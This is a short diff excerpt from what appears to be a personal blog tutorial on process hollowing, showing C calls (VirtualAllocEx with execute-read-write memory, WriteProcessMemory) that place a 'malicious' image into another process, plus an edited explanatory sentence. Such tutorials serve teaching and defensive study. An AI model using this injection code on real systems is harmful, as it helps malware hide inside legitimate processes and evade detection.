AmineGoumhand1/MyBlogs/src/content/posts/process-hollowing.md

     PVOID mem = VirtualAllocEx(proc_info.hProcess, BaseAddress, nt_head->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 ```
-First thing, we retrieve the DOS and NT headers from the mapped malicious file., as we said before, we allocate space to contain our malicious code in the unmapped memory. we grap the size of the code to allocate from our malicious code PE header using ``` nt_head->OptionalHeader.SizeOfImage ```.
+After that we retrieve the DOS and NT headers from the mapped malicious file, as we said before, we allocate space to contain our malicious code in the memory. we grap the size of the code to allocate from our malicious code PE header using ``` nt_head->OptionalHeader.SizeOfImage ```.

 ```
     if (!WriteProcessMemory(proc_info.hProcess, BaseAddress, EvilImage, nt_head->OptionalHeader.SizeOfHeaders, 0)) {